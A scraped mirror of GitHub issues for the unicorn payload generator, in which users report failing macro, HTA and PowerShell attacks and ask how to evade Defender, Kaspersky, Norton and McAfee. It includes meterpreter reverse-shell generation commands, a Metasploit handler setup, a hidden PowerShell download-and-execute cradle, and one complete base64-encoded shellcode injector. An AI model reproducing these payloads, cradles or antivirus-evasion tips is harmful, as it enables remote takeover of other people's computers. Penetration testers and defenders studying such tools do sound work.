Code Monkey home page Code Monkey logo

unicorn's Issues

file is not downloaded or executed.

python unicorn.py windows/download_exec exe=test.exe url=http://someurl.com/myexe.exe macro

generated macro not working in office,(does not download and execute my exe).

Unicorn payload generation for x64

@trustedsec Hi does unicorn provide a feature to create the payload for x64, as i'm aware the payload created for x86 but i would need to create it on x64. is it possible to create the payload for macro attack in x64 if so please do guide me, thanks.

Macro detected by windows defender.

Looks like the format of the macro is being picked up by windows defender.
It may be a good idea to poach the output format of empire's macro payload, since that still doesn't get detected :D

Last Update (version 2.3.4) Not Work!

Hi Dear,

Since version 2.3.4 released, powershell_attack.txt Not Work!
I try this command:
python unicorn.py windows/meterpreter/reverse_https ip port
and convert .txt file to .bat file and run that, but powershell.exe don't open in target system (my local vm system) and listener don't receive every sessions!
In other hand this time, previous version catch by windows defender, kaspersky and norton AVs :(

Detected by 3 major AVs

Hey,

the new version is detected at runtime by Kaspersky, Symantec and McAfee. Any chance you are planing another round of obfuscation ninjutsu soon? :)

Thanks

windows 7 now cant run word

hello unicorn working perfect , but now i cant run any of word files always gives me an error,how can i reverse that?

Dns Resolve fails.

Hello ,

i admire your work and good work you've done here ! i am using unicorn for a long time , and i realised that i have a problem , i don't know what's wrong with it but i think i can report it here and you might be able to fix it , well the issue is simple i am generating a payload like this:

python unicorn.py windows/meterpreter/reverse_tcp HOST PORT hta .

i have my file generated and it works like a charm , but i am using a DNS as a host so it can resovle to my dynamic Ip address , the problem is that if my ip address changes , the DNS normally without any problems resovle the new one ! but ! we have a problem the HTA file doesn't resolve the new ip address from the DNS , which currently it should because the DNS has been updated , but the script doesn't!!

Please fix it :)

.hta's Broken in latest unicorn?

I'm no longer able to generate working .hta's using unicorn. I was wondering if you could confirm this is a legitimate issue, or is this just me?

I've generated working payloads on my setup before pulling the latest from GitHub. The problem appears to be that the .hta generated has some sort of syntax error, maybe from unbalanced quotes?

Steps to Recreate

  1. Clone the latest unicorn, or git pull to the latest
git clone https://github.com/trustedsec/unicorn.git

or, if you have it, update to the latest:

git pull
  1. Generate an .hta file (note: no errors show while generating, it is not a problem with generating the payload, the problem appears to be with the syntax script or powershell generated)
python unicorn.py windows/meterpreter/reverse_tcp 123.123.123.123 443 hta
  1. Launch the .hta file on a Windows host, and observe the error:
    image

Temporary Workaround

Reverting to version 2.4.2 appears to fix the issue:

git clone https://github.com/trustedsec/unicorn.git
git checkout tags/2.4.2
python unicorn.py windows/meterpreter/reverse_tcp 123.123.123.123 443 hta

Additional Details

I believe the issue is the quoting right before the larger base64 part of the payload (right before “STUFF” in this comparison for example). Reverting to 2.4.2, right before commit 8fc0a81, appears to resolve the error message and allow proper payload execution.

2.4.2:

a.run('%windir%\\System32\\cmd.exe /c powershell -w 1 -C "sv 77 -;sv II ec;sv Z ((gv 77).value.toString()+(gv II).value.toString());powershell (gv Z).value.toString() "STUFF

2.4.3

a.run('%windir%\\System32\\cmd.exe /c powershell -w 1 -C "sv CY -;sv 5S ec;sv n ((gv CY).value.toString()+(gv 5S).value.toString());powershell (gv n).value.toString() 'STUFF

So it could be related to this commit: 8fc0a81

Suggestion: Allow disabling of sync on a pr. configuration basis

Hi Kam,

Big fan of Unicorn, so i figured i would add a suggestion that I think would make it even better!

We all know that keeping development environments up2date with content from production environments is a real hassle, often involving database backups etc. Unicorn ofcourse lets us get around this!

However, a human error might occur where someone accidentally syncs content on a production environment, so it would be awesome if it was possible to disable sync for a given configuration.

HTA Attack Error

Team,

I am trying the HTA attack on my lab (Win 10/2012). But when I access https://192.168.1.5 on victim end. I got the below error.

Server End:
python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > set EnableStageEncoding true
EnableStageEncoding => true
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[] Started HTTPS reverse handler on https://0.0.0.0:443/
[
] Starting the payload handler...
msf exploit(handler) > [] 192.168.1.100:41859 Request received for /...
[
] 192.168.1.100:41859 Unknown request to / #<Rex::Proto::Http::Request:0x0000000414c0b8 @headers={"Accept"=> "text/html, application/xhtml+xml, image/jxr, /", "Host"=>"192.168.1.5", "Connection"=>"Keep-Alive", "Acce pt-Language"=>"en-IN", "User-Agent"=>"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, lik e Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586", "Accept-Encoding"=>"gzip, deflate"}, @auto_cl=true, @State=3, @transfer_chunked=false, @inside_chunk=false, @bufq="", @Body="", @method="GET", @raw_uri="/", @uri_ parts={"QueryString"=>{}, "Resource"=>"/"}, @proto="1.1", @chunk_min_size=1, @chunk_max_size=10, @uri_encode_m ode="hex-normal", @relative_resource="/", @body_bytes_left=0>...
[] 192.168.1.100:41877 Request received for /...
[
] 192.168.1.100:41877 Unknown request to / #<Rex::Proto::Http::Request:0x0000000406e0b0 @headers={"Host"=>" 192.168.1.5", "Accept"=>"text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8", "Accept-Language"= >"en-us", "Connection"=>"keep-alive", "Accept-Encoding"=>"gzip, deflate", "User-Agent"=>"Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/6 02.1"}, @auto_cl=true, @State=3, @transfer_chunked=false, @inside_chunk=false, @bufq="", @Body="", @method="GE T", @raw_uri="/", @uri_parts={"QueryString"=>{}, "Resource"=>"/"}, @proto="1.1", @chunk_min_size=1, @chunk_max _size=10, @uri_encode_mode="hex-normal", @relative_resource="/", @body_bytes_left=0>...

macro not connect

macro attack in version 2.7.2 dont connect, but in version 2.6 connect with out problems

Power Shell will be expired after 24h

Hi amigos
I have an issue that when I want to use the powershell.txt codes after 24h,the powershell will run but in metasploit nothing will not happen but during first 24h of generating codes every thing is okey.
I think it is related to expiry date of that payload which has set to limited hours.
plz fix this serious issue
Peace

macro problem in https

Hi
When i try to generate https macro it doesn’t work for me when i put code in xls or doc it doesn’t connect best case i got once "Unknown request to / with UA ... "

error

I got this erron witch new version.
xxx@xxxx:/unicorn# python unicorn.py
File "unicorn.py", line 438
if not os.popen("msfvenom -h").read():
^
IndentationError: unexpected indent

DDE meterpreter/reverse_https payload consistently exceeds command line limit

First, thank you Dave for this awesome tool!

I've been trying to generate a DDE meterpreter/reverse_https payload but I cannot due to the payload exceeding the command line limit.

I have tried with various IPs to include the example that unicorn provides: python unicorn.py windows/meterpreter/reverse_https 192.168.5.5 443 dde

Unicorn provides this warning: [!] WARNING. WARNING. Length of the payload is above command line limit length of 8191. Recommend trying to generate again or the line will be cut off.
Press {return} to continue.

I am using the latest version of unicorn via this repo. Thanks again!

powershell_attack.txt is not working just after a day

Dear trustedsec,

There was a misunderstanding about my prior post. Now, let me explain clearly.
I'm going to generate a powershell_attack.txt through unicorn.py tool and then use it to attack a target via metasploit. However, that powershell_attack.txt is stable for just some hours and after a period of time it will be expired or not working anymore.
I would be very grateful if you give me some information about this matter.
Is there any way to stabilize that powershell_attack.txt code for more time and use it for another time?

Regards,

Error

hi guys , i have kali rolling 2.0 and show this error

File "unicorn.py", line 438
if not os.popen("msfvenom -h").read():
^
IndentationError: unexpected indent

why ?

Embedded persistence

Hi, i was wondering if you have thought of a way to initially include persistence during the generation of the payload.
Cheers

persistence generation

Hello, i would like to know if the .bat file is on persistence mode when we are generating it.
Otherwise, if the victim opens it without connexion, Is it possible to capture a session when the connexion is put on.

unicorn detection

Nice project keep up the good work man.

I test this Macro Attack against Kaspersky and NOD32 but it was detected in memory and closed due it uses powershell to execute another powershell. do you think there is a way this can be bypasseed in some ways?

Thanks

We have a problem here

Well, bypass properly the AV using my own obfuscation and using the system memory.

The problem now is that, when I'm in the meterpreter and I try to migrate or open the shell, this action is suspicious and is blocked by the "victim" AV.

So, I can start the session shell, but once I'm on the session, each action or movement from meterpreter is caught by mr kspky

Any hint? thanks

Too many line continuations

Thanks for this awesome powershell tool trustedsec. I am just having an issue with office 2013, where i ve customised the payload to reverse_https with macro attack.

When I copy/paste the code, an error box appears stating "Too many line continuations"
Is there a way around that?

Thank you

Norton AV Trouble

Hi there,

I understand that TrustedSec is not responsible for the meterpreter stager, however I thought that this particular case was interesting due to the fact that SetStageEncoding was set to true.

Environment details listed below:

Norton Security (Full Trial)
Version: 22.5.2.15

unicorn

Any feasible way to get around this while still being able to use Meterpreter? Is there any encoding options that I am leaving out?

The payload is being executed with the following Scheduled Task:

Powershell.exe -NoExit -Windowstyle hidden IEX ((New-Object Net.WebClient).DownloadString('http://pentestbox/powershell_attack.txt'))

Note: I'm not using powershell_attack.txt as the filename.

No connection

Everytime I execute a payload on a windows machine (running 8) none of the attacks give me back a connection. I run the Social Engineering Toolkit version of the powershell attack and it works fine so it is not my computer.

Length of the payload is above command line limit length of 8191

hello i getting warning and my .exe is only 32 kb.
i am using: windows/download_exec exe=test.exe url=http://badurl.com/payload.exe

[!] WARNING. WARNING. Length of the payload is above command line limit length of 8191. Recommend trying to generate again or the line will be cut off.
Press {return} to continue.

what is cause?

download_exec for HTA

can you try implement download_exec for HTA file? the reverse is kinda suck sometimes and would have been really good if can use download_exec command

Shares

MissingExpressionAfterOperator Parser Error with Powershell_attack.txt execution

Hi
I am using Kali Linux (IP: 192.168.56.103) as the C&C and a test Windows 7 x64 VM (192.168.56.201) as the client.

I run the following to generate the powershell_attack.txt and unicorn.rc command.

python unicorn.py windows/meterpreter/reverse_tcp 192.168.56.103 443

When I copy and paste the command in the client from powershell, the window disappears and I do not get a reverse meterpreter shell on the C&C. Then, I slightly modify the powershell_attack.txt from "-w 1" to "-w 0" to ensure that the window does not disappear and I can see the error. I get the following error:


Missing expression after unary operator '-'.
At line:1 char:2
+ - <<<< e''c JABlAGgAIAA9ACAAJwBbAEQAbABsAEkAbQBwAG.......... <omitted tldr;>.........
    + CategoryInfo          : ParserError: (-:String) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : MissingExpressionAfterOperator

The original powershell_attack.txt file context is as shown below.

Thanks
Max

powershell -w 1 -C "s''v Wtl -;s''v Om e''c;s''v CT ((g''v Wtl).value.toString()+(g''v Om).value.toString());powershell (g''v CT).value.toString() ('JABJAEkAIAA9ACAAJwAkAGUAaAAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgA'+'cgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAG0AQQBrACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAZQBoACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHUAQgBxAGUAYwAgAD0AIAAwAHgAZABhACwAMAB4AGQANwAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQANwAsADAAeABiAGIALAAwAHgANgA2ACwAMAB4ADIANwAsADAAeABiADQALAAwAHgAOQA2ACwAMAB4ADgAMwAsADAAeABlADgALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA1ADgALAAwAHgAMQA0ACwAMAB4ADAAMwAsADAAeAA1ADgALAAwAHgA'+'NwAyACwAMAB4AGMANQAsADAAeAA0ADEALAAwAHgANgBhACwAMAB4ADkAMgAsADAAeAA4AGIALAAwAHgAYQBhACwAMAB4ADkAMwAsADAAeAA2ADIALAAwAHgAZQBjACwAMAB4ADIAMwAsADAAeAA3ADYALAAwAHgANQAzACwAMAB4ADIAYwAsADAAeAA1ADcALAAwAHgAZgAyACwAMAB4AGMAMwAsADAAeAA5AGMALAAwAHgAMQAzACwAMAB4ADUANgAsADAAeABlAGYALAAwAHgANQA3ACwAMAB4ADcAMQAsADAAeAA0ADMALAAwAHgANgA0ACwAMAB4ADEANQAsADAAeAA1AGUALAAwAHgANgA0ACwAMAB4AGMAZAAsADAAeAA5ADAALAAwAHgAYgA4ACwAMAB4ADQAYgAsADAAeABjAGUALAAwAHgAOAA5ACwAMAB4AGYAOQAsADAAeABjAGEALAAwAHgANABjACwAMAB4AGQAMAAsADAAeAAyAGQALAAwAHgAMgBkACwAMAB4ADYAZAAsADAAeAAxAGIALAAwAHgAMgAwACwAMAB4ADIAYwAsADAAeABhAGEALAAwAHgANAA2ACwAMAB4AGMAOQAsADAAeAA3AGMALAAwAHgANgAzACwAMAB4ADAAYwAsADAAeAA3AGMALAAwAHgAOQAxACwAMAB4ADAAMAAsADAAeAA1ADgALAAwAHgAYgBkACwAMAB4ADEAYQAsADAAeAA1AGEALAAwAHgANABjACwAMAB4AGMANQAsADAAeABmAGYALAAwAHgAMgBhACwAMAB4ADYAZgAsADAAeABlADQALAAwAHgANQAxACwAMAB4ADIAMQAsADAAeAAzADYALAAwAHgAMgA2ACwAMAB4ADUAMwAsADAAeABlADYA'+'LAAwAHgANAAyACwAMAB4ADYAZgAsADAAeAA0AGIALAAwAHgAZQBiACwAMAB4ADYAZgAsADAAeAAzADkALAAwAHgAZQAwACwAMAB4AGQAZgAsADAAeAAwADQALAAwAHgAYgA4ACwAMAB4ADIAMAAsADAAeAAyAGUALAAwAHgAZQA0ACwAMAB4ADEANwAsADAAeAAwAGQALAAwAHgAOQBmACwAMAB4ADEANwAsADAAeAA2ADkALAAwAHgANAA5ACwAMAB4ADIANwAsADAAeABjADgALAAwAHgAMQBjACwAMAB4AGEAMwAsADAAeAA1ADQALAAwAHgANwA1ACwAMAB4ADIANwAsADAAeAA3ADAALAAwAHgAMgA3ACwAMAB4AGEAMQAsADAAeABhADIALAAwAHgANgAzACwAMAB4ADgAZgAsADAAeAAyADIALAAwAHgAMQA0ACwAMAB4ADQAOAAsADAAeAAyAGUALAAwAHgAZQA2ACwAMAB4AGMAMwAsADAAeAAxAGIALAAwAHgAMwBjACwAMAB4ADQAMwAsADAAeAA4ADcALAAwAHgANAA0ACwAMAB4ADIAMAAsADAAeAA1ADIALAAwAHgANAA0ACwAMAB4AGYAZgAsADAAeAA1AGMALAAwAHgAZABmACwAMAB4ADYAYgAsADAAeABkADAALAAwAHgAZAA1ACwAMAB4ADkAYgAsADAAeAA0AGYALAAwAHgAZgA0ACwAMAB4AGIAZQAsADAAeAA3ADgALAAwAHgAZgAxACwAMAB4AGEAZAAsADAAeAAxAGEALAAwAHgAMgBlACwAMAB4ADAAZQAsADAAeABhAGQALAAwAHgAYwA1ACwAMAB4ADgAZgAsADAAeABhAGEALAAwAHgAYQA1ACwAMAB4AGUAYgAsADAA'+'eABjADQALAAwAHgAYwA2ACwAMAB4AGUANwAsADAAeAA2ADMALAAwAHgAMgA4ACwAMAB4AGUAYgAsADAAeAAxADcALAAwAHgANwAzACwAMAB4ADIANgAsADAAeAA3AGMALAAwAHgANgBiACwAMAB4ADQAMQAsADAAeABlADkALAAwAHgAZAA2ACwAMAB4AGUAMwAsADAAeABlADkALAAwAHgANgAyACwAMAB4AGYAMQAsADAAeABmADQALAAwAHgAMABlACwAMAB4ADUAOQAsADAAeAA0ADUALAAwAHgANgBhACwAMAB4AGYAMQAsADAAeAA2ADIALAAwAHgAYgA2ACwAMAB4AGEAMgAsADAAeAAzADUALAAwAHgAMwA2ACwAMAB4AGUANgAsADAAeABkAGMALAAwAHgAOQBjACwAMAB4ADMANwAsADAAeAA2AGQALAAwAHgAMQBkACwAMAB4ADIAMQAsADAAeABlADIALAAwAHgAMQA4ACwAMAB4ADEANwAsADAAeABiADUALAAwAHgAYwBkACwAMAB4ADcANQAsADAAeAAxAGYALAAwAHgAMgAyACwAMAB4AGEANgAsADAAeAA4ADcALAAwAHgANgAwACwAMAB4AGEAZAAsADAAeAA4AGQALAAwAHgAMAAxACwAMAB4ADgANgAsADAAeABmAGQALAAwAHgAYQAxACwAMAB4ADQAMQAsADAAeAAxADcALAAwAHgAYgBkACwAMAB4ADEAMQAsADAAeAAyADIALAAwAHgAYwA3ACwAMAB4ADUANQAsADAAeAA3ADgALAAwAHgAYQBkACwAMAB4ADMAOAAsADAAeAA0ADUALAAwAHgAOAAzACwAMAB4ADYANwAsADAAeAA1ADEALAAwAHgAZQBmACwAMAB4ADYA'+'YwAsADAAeABkAGUALAAwAHgAMAA5ACwAMAB4ADgANwAsADAAeAAxADUALAAwAHgANwBiACwAMAB4AGMAMQAsADAAeAAzADYALAAwAHgAZAA5ACwAMAB4ADUAMQAsADAAeABhAGYALAAwAHgANwA4ACwAMAB4ADUAMQAsADAAeAA1ADYALAAwAHgANABmACwAMAB4ADMANgAsADAAeAA5ADIALAAwAHgAMQAzACwAMAB4ADQAMwAsADAAeABhAGUALAAwAHgANQAyACwAMAB4ADYAZQAsADAAeAAzADkALAAwAHgANwA4ACwAMAB4ADYAYwAsADAAeAA0ADQALAAwAHgANQA0ACwAMAB4ADgANAAsADAAeABmADgALAAwAHgANgAzACwAMAB4AGYAZgAsADAAeABkADMALAAwAHgAOQA0ACwAMAB4ADYAOQAsADAAeAAyADYALAAwAHgAMQAzACwAMAB4ADMAYgAsADAAeAA5ADEALAAwAHgAMABkACwAMAB4ADIAOAAsADAAeABmADIALAAwAHgAMAA3ACwAMAB4AGUAZQAsADAAeAA0ADYALAAwAHgAZgBiACwAMAB4AGMANwAsADAAeABlAGUALAAwAHgAOQA2ACwAMAB4AGEAZAAsADAAeAA4AGQALAAwAHgAZQBlACwAMAB4AGYAZQAsADAAeAAwADkALAAwAHgAZgA2ACwAMAB4AGIAYwAsADAAeAAxAGIALAAwAHgANQA2ACwAMAB4ADIAMwAsADAAeABkADEALAAwAHgAYgAwACwAMAB4AGMAMwAsADAAeABjAGMALAAwAHgAOAAwACwAMAB4ADYANQAsADAAeAA0ADMALAAwAHgAYQA1ACwAMAB4ADIAZQAsADAAeAA1ADAALAAwAHgAYQAzACwA'+'MAB4ADYAYQAsADAAeABkADAALAAwAHgAYgA3ACwAMAB4ADMANQAsADAAeAA1ADYALAAwAHgAMAA3ACwAMAB4AGYAMQAsADAAeAA0ADMALAAwAHgAYgA2ACwAMAB4ADkAYgA7ACQAdQBCAHEAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAdQBCAHEAZQBjAC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAHUAQgBxACAAPQAgACQAdQBCAHEAZQBjAC4ATABlAG4AZwB0AGgAfQA7ACQAWgBjAD0AJABtAEEAawA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAHUAQgBxACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAegBwAFoAPQAwADsAJAB6AHAAWgAgAC0AbABlACAAKAAkAHUAQgBxAGUAYwAuAEwAZQBuAGcAdABoAC0AMQApADsAJAB6AHAAWgArACsAKQAgAHsAJABtAEEAawA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFoAYwAuAFQAbwBJAG4AdAAzADIAKAApACsAJAB6AHAAWgApACwAIAAkAHUAQgBxAGUAYwBbACQAegBwAFoAXQAsACAAMQApAH0AOwAkAG0AQQBrADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABaAGMALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ACkAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAEkAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4A'+'QwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABJAEkAKQApADsAJABkAEMAcwAgAD0AIAAiAC0AZQAnACcAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAawBuAFIAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAawBuAFIAIAAkAGQAQwBzACAAJABJAGMAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAZABDAHMAIAAkAEkAYwAiADsAfQA=')"

Word 2016 : Powershell Macro not launched automatically

Hello,

Big fan, just ran into an issue with a relatively small powershell macro. When opening Word 2016, I'd expect, after "Enabling Content", that the Macro should launch automatically... but it does not. I can only launch it by navigating to "View -> Macro -> Run -> Auto_Open", and then the payload is executed successfully.

Macro was created with the "macro 500" switch and seems to be fully functional as seen when executed manually.

Thoughts? What can I do to debug this?

Word 2016

I have been trying to use this today with Word 2016 (and Excel) without any success. I can use it with just powershell via commandline, session loads fine. But with Word (freshly installed earlier in the week in a fresh install of Win10) I get nothing. Looking at traffic, nothing comes out of machine after I open the Word file at all. I can't see any error or feedback that is any different to expectations from videos online. It does the popup saying older version of word. Just doesn't seem to send the payload to powershell.

not able to generate payload

Hello I am getting below error and tried with diffrent python version but no use ...please help

[!] Shellcode was not generated for some reason. Check payload name and if Metasploit is working and try again.

Supported Windows / Office Versions

Sorry for opening an issue for this but i don't know where else to ask.

I have tested unicorn successfully under Windows 7 & Office 2016. Any idea what other Windows / Office versions are supported?

Wrong content of resource file

When i do

python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 macro

just as an example, the output of .rc file is next

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST windows/meterpreter/reverse_tcp
set LPORT 192.168.1.5
set ExitOnSession false
set EnableStageEncoding true
exploit -j

So, the payload value takes place of lhost value, and lhost is taking over the lport value. And i wonder if the generated txt file also contains appropriate code, because my msfconsole did not catch any session

python version for generate payload

Hi

I'm using all version of python for generate shellcode, but i receive error :

python2.7 unicorn.py payload/windows/meterpreter/reverse_tcp 45.45.45.45 445
[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...
[!] Length of shellcode was not generated. Check payload name and if Metasploit is working and try again.
Exiting....

python >= 3 :

python3.5 unicorn.py payload/windows/meterpreter/reverse_tcp 45.45.45.45 445
[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...
[!] Something went wrong, printing the error: name 'reduce' is not defined

Of course i install all dependency of python packages.
How solved it?

TNX

dont return session in kali.

hi
I generate payload with unicorn in kali 2016.when i run pwershell.bat dont give any access to me .dont return session in kali.
i think your code dont work.
please help me .
thanks

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.